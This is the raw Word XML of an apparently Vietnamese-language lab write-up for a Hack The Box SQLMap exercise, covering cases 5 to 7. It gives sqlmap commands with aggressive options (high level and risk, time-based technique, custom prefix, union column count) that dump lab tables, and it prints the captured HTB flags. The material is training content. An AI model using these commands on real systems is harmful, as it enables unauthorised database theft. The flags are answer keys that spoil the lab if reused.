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ACBE0" w14:textId="2261E3FE" w:rsidR="00FB3DB6" w:rsidRDefault="00FB3DB6" w:rsidP="00FB3DB6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB3DB6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>What's the contents of table flag5? (Case #5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8EA27B" w14:textId="100D469E" w:rsidR="00B90B6E" w:rsidRDefault="00FB3DB6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F12154A" wp14:editId="0CF49273">
            <wp:extent cx="5943600" cy="4992370"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12027179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17981" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4992370"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB641DD" w14:textId="1CB14997" w:rsidR="00510F00" w:rsidRDefault="00510F00">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5860F953" wp14:editId="63BD0F83">
            <wp:extent cx="5943600" cy="1317625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1916087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87014" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1317625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="62040145" w14:textId="7E04E1B4" w:rsidR="00FB3DB6" w:rsidRDefault="00FB3DB6">
      <w:r>
        <w:t>Ta sử dụng công cụ Sqlmap để quét lỗ hổng với câu lệnh :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E18A5D" w14:textId="2B678C6B" w:rsidR="00FB3DB6" w:rsidRDefault="00FB3DB6">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6D377E" w14:textId="70F47B55" w:rsidR="00FB3DB6" w:rsidRDefault="00FB3DB6">
      <w:r w:rsidRPr="00FB3DB6">
        <w:t>sqlmap -r Case5.txt -T flag5 --batch --dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE5714F" w14:textId="7A88E635" w:rsidR="00FB3DB6" w:rsidRDefault="00FB3DB6">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E087BC" w14:textId="4F8F1411" w:rsidR="0082377C" w:rsidRDefault="0082377C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Kết quả quét </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDE41E0" w14:textId="5B2100B8" w:rsidR="0082377C" w:rsidRDefault="0082377C">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649BD22A" w14:textId="60BEFF70" w:rsidR="0082377C" w:rsidRDefault="0082377C">
      <w:r w:rsidRPr="0082377C">
        <w:t>all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18406EA5" w14:textId="7F129D39" w:rsidR="0082377C" w:rsidRDefault="0082377C">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2E9780" w14:textId="4B650A33" w:rsidR="00170952" w:rsidRDefault="00170952">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E452768" wp14:editId="3A5F0714">
            <wp:extent cx="5943600" cy="542290"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="937541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41534" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="542290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="415B6186" w14:textId="1D63436C" w:rsidR="00A93D90" w:rsidRDefault="00A93D90" w:rsidP="00A93D90">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chúng ta cần sử dụng một câu lệnh quét cụ thể hơn </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE2DB64" w14:textId="56068EC6" w:rsidR="00A93D90" w:rsidRDefault="0042761E" w:rsidP="00A93D90">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E27D60" w14:textId="23E11622" w:rsidR="0042761E" w:rsidRDefault="0042761E" w:rsidP="00A93D90">
      <w:r w:rsidRPr="0042761E">
        <w:t>sqlmap -r Case5.txt --batch --dump -T flag5 -D testdb --no-cast --dbms=MySQL --technique=T --time-sec=10 --level=5 --risk=3 --fresh-queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFBFF4A" w14:textId="36504219" w:rsidR="0042761E" w:rsidRDefault="0042761E" w:rsidP="00A93D90">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C20D85E" w14:textId="78057473" w:rsidR="00BA784F" w:rsidRDefault="00BA784F" w:rsidP="00A93D90">
      <w:r>
        <w:t xml:space="preserve">Or </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2CC554" w14:textId="1617F088" w:rsidR="00BA784F" w:rsidRDefault="00BA784F" w:rsidP="00A93D90">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EC9AD7" w14:textId="4CF1CC70" w:rsidR="00BA784F" w:rsidRDefault="00BA784F" w:rsidP="00A93D90">
      <w:r w:rsidRPr="00BA784F">
        <w:t>sqlmap -r Case5.txt --batch --dump -T flag5 --level=5 --risk=3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D5D391" w14:textId="48EFA929" w:rsidR="009B510E" w:rsidRDefault="00BA784F" w:rsidP="00A93D90">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF25D91" w14:textId="6FD62547" w:rsidR="00D9445E" w:rsidRDefault="00D9445E" w:rsidP="00A93D90">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0561148D" wp14:editId="711331D7">
            <wp:extent cx="5943600" cy="2316480"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="3601668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66898" name="Picture 1" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2316480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5584AB42" w14:textId="6CB234D7" w:rsidR="00D9445E" w:rsidRDefault="00D9445E" w:rsidP="00A93D90">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BA210EC" wp14:editId="34660A1B">
            <wp:extent cx="5514975" cy="2447925"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="6043934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93489" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5514975" cy="2447925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A4EED4" w14:textId="18D1E8FC" w:rsidR="00407CB0" w:rsidRDefault="00407CB0" w:rsidP="00A93D90">
      <w:r>
        <w:t>P/s:</w:t>
      </w:r>
      <w:r w:rsidRPr="00407CB0">
        <w:t xml:space="preserve"> HTB{700_much_r15k_bu7_w0r7h_17}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337D87FD" w14:textId="77777777" w:rsidR="006B3287" w:rsidRDefault="006B3287" w:rsidP="00A93D90"/>
    <w:p w14:paraId="2AB659FC" w14:textId="30A6F263" w:rsidR="006B3287" w:rsidRDefault="006B3287" w:rsidP="006B3287">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B3287">
        <w:t>What's the contents of table flag6? (Case #6)</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3287">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC68A21" w14:textId="1B11E165" w:rsidR="00E868DD" w:rsidRDefault="00E868DD" w:rsidP="006B3287">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1800902C" wp14:editId="17EB6F58">
            <wp:extent cx="5943600" cy="1631315"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="867036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36249" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1631315"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5425CE28" w14:textId="76B0FC28" w:rsidR="006B3287" w:rsidRDefault="006B3287" w:rsidP="006B3287">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Lưu request case#6 vào file Case6.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0553B0C4" w14:textId="77777777" w:rsidR="00E868DD" w:rsidRDefault="00E868DD" w:rsidP="006B3287">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="009BFEE9" w14:textId="7B8EE4F1" w:rsidR="00C27DBF" w:rsidRDefault="006B3287" w:rsidP="00C27DBF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="035A2E4D" wp14:editId="24EE68D3">
            <wp:extent cx="5943600" cy="4372610"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="19362556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55650" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4372610"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CC774E" w14:textId="59D5EDA6" w:rsidR="005E1D9A" w:rsidRDefault="005E1D9A" w:rsidP="005E1D9A">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A59FF8F" w14:textId="66DDB743" w:rsidR="005E1D9A" w:rsidRPr="005E1D9A" w:rsidRDefault="005E1D9A" w:rsidP="005E1D9A">
      <w:r w:rsidRPr="005E1D9A">
        <w:t>sqlmap -r Case6.txt --batch --dump -T flag6 -D testdb --no-cast --level=5 --risk=3 --prefix='`)'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0F5829" w14:textId="17CB1934" w:rsidR="005E1D9A" w:rsidRDefault="005E1D9A" w:rsidP="00C27DBF">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4EC935" w14:textId="57E89311" w:rsidR="009F3094" w:rsidRDefault="009F3094" w:rsidP="00C27DBF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="105ECF57" wp14:editId="0BED91CA">
            <wp:extent cx="5943600" cy="2338070"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="250424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2478" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2338070"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A112766" w14:textId="6763DE08" w:rsidR="009F3094" w:rsidRDefault="009F3094" w:rsidP="00C27DBF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D49BA76" wp14:editId="23297E3F">
            <wp:extent cx="5943600" cy="2941320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2007852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52483" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2941320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFD3694" w14:textId="51D1250D" w:rsidR="009F3094" w:rsidRDefault="009F3094" w:rsidP="00C27DBF">
      <w:r>
        <w:t>P/s:</w:t>
      </w:r>
      <w:r w:rsidRPr="009F3094">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F3094">
        <w:t>HTB{v1nc3_mcm4h0n_15_4570n15h3d}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26096A67" w14:textId="77777777" w:rsidR="00E868DD" w:rsidRDefault="00E868DD" w:rsidP="00C27DBF"/>
    <w:p w14:paraId="08BAAFA0" w14:textId="20522B86" w:rsidR="00E868DD" w:rsidRDefault="00E868DD" w:rsidP="00C27DBF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B5C72D9" wp14:editId="3CACCDB3">
            <wp:extent cx="5943600" cy="2028190"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7680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56" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2028190"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5769D679" w14:textId="13861C83" w:rsidR="00574338" w:rsidRDefault="00574338" w:rsidP="00C27DBF">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBD56D6" w14:textId="0A8C07D9" w:rsidR="00574338" w:rsidRDefault="00574338" w:rsidP="00C27DBF">
      <w:r w:rsidRPr="00574338">
        <w:t>sqlmap -r Case7.txt --batch --dump -T flag7 -D testdb --no-cast --level=5 --risk=3 --union-cols=5 --dbms=MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1137D34A" w14:textId="794BFC5E" w:rsidR="00574338" w:rsidRDefault="00574338" w:rsidP="00C27DBF">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D58A42C" w14:textId="07870B20" w:rsidR="00085DEB" w:rsidRDefault="00085DEB" w:rsidP="00C27DBF">
      <w:r w:rsidRPr="00085DEB">
        <w:t>--Union-cols = 5: Chỉ định số lượng cột sẽ được sử dụng trong truy vấn liên minh trong quá trình khai thác tiêm SQL. Bằng cách đặt cờ này thành 5, bạn đang hướng dẫn SQLMAP cho rằng truy vấn dễ bị tổn thương trả về 5 cột. Điều này rất quan trọng để xây dựng các truy vấn liên minh hợp lệ, vì cả các truy vấn ban đầu và được tiêm phải có cùng một số cột để hoạt động chính xác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D7BBFE" w14:textId="4EE8143F" w:rsidR="00DD4CB4" w:rsidRDefault="00DD4CB4" w:rsidP="00C27DBF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="385D8F1A" wp14:editId="2CEC6684">
            <wp:extent cx="5943600" cy="1455420"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4348499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49999" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1455420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A88087" w14:textId="0874ADE0" w:rsidR="00DD4CB4" w:rsidRDefault="00DD4CB4" w:rsidP="00C27DBF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F3F1621" wp14:editId="77FB1983">
            <wp:extent cx="5943600" cy="2967990"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="18276383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38310" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2967990"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6A9CCA" w14:textId="02EE2D50" w:rsidR="00DD4CB4" w:rsidRDefault="00DD4CB4" w:rsidP="00C27DBF">
      <w:r>
        <w:t xml:space="preserve">P/s: </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD4CB4">
        <w:t>HTB{un173_7h3_un173d}</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00DD4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83375"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F0D4B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AF748E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AF4A3436"/>
    <w:lvl w:ilvl="0" w:tplc="320429A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409131">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="897209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B6E"/>
    <w:rsid w:val="00085DEB"/>
    <w:rsid w:val="00170952"/>
    <w:rsid w:val="001A38B2"/>
    <w:rsid w:val="001A57CB"/>
    <w:rsid w:val="00407CB0"/>
    <w:rsid w:val="0042761E"/>
    <w:rsid w:val="00510F00"/>
    <w:rsid w:val="00574338"/>
    <w:rsid w:val="005E1D9A"/>
    <w:rsid w:val="006B3287"/>
    <w:rsid w:val="0082377C"/>
    <w:rsid w:val="009B510E"/>
    <w:rsid w:val="009F3094"/>
    <w:rsid w:val="00A0173F"/>
    <w:rsid w:val="00A93D90"/>
    <w:rsid w:val="00B90B6E"/>
    <w:rsid w:val="00BA784F"/>
    <w:rsid w:val="00BF0887"/>
    <w:rsid w:val="00C27DBF"/>
    <w:rsid w:val="00D9445E"/>
    <w:rsid w:val="00DD4CB4"/>
    <w:rsid w:val="00E868DD"/>
    <w:rsid w:val="00FB3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F7E8"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D16F2EEA-20EE-49FE-9DCC-50DAA855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0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0B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0B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0B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B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B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B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B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B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0B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0B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0B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0B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B6E"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00B90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B6E"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00B90B6E"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00B90B6E"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00B90B6E"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00B90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B6E"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00B90B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176425">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="114080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Quoc Khanh D21AT03</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Ly Quoc Khanh D21AT03</cp:lastModifiedBy>
  <cp:revision>19</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-01-26T14:55:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-27T09:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>